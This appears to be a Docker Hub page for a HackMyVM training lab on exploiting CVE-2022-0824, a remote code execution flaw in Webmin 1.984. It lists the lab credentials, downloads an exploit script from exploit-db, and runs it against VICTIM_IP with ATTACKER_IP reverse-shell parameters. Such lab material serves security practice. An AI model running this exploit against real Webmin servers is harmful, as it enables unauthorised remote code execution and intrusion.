We will learn how to exploit (CVE-2022-0824), a RCE that affects Webmin.
Credentials are: admin/love
Webmin 1.984
Webmin <= 1.984
docker run --name webmin -it -p 10000:10000 --rm hackmyvm/webmin
wget https://www.exploit-db.com/raw/50809 -O exploit.py
python3 exploit.py -t http://VICTIM_IP:10000 -c admin:love -LS ATTACKER_IP:9090 -L ATTACKER_IP -P 4444
If you want to give us some feedback or you need support feel free to join us at https://hackmyvm.eu/
Content type
Image
Digest
Size
119.6 MB
Last updated
over 4 years ago
docker pull hackmyvm/webmin